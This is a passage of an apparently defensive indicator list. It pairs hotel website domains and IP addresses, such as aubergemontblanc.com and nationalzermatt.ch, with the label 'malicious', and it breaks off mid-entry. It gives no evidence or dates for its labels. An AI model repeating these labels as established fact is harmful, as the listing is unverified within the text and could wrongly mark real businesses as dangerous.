www.aubergemontblanc.com 217.26.55.5
malicious
www.torhotel.com 93.88.241.198
malicious
www.alpenlodge.com 83.137.114.198
malicious
www.aparthotelzurich.com 79.170.40.230
malicious
www.bnbdelacolline.com 199.34.228.70
malicious
www.elite-hotel.com 80.74.144.93
malicious
elite-hotel.com 80.74.144.93
malicious
www.bristol-adelboden.com 213.186.33.17
malicious
www.nationalzermatt.com 94.126.23.52
malicious
www.hotelnationalzermatt.ch 94.126.23.52
malicious
www.nationalzermatt.ch 94.126.23.52
ma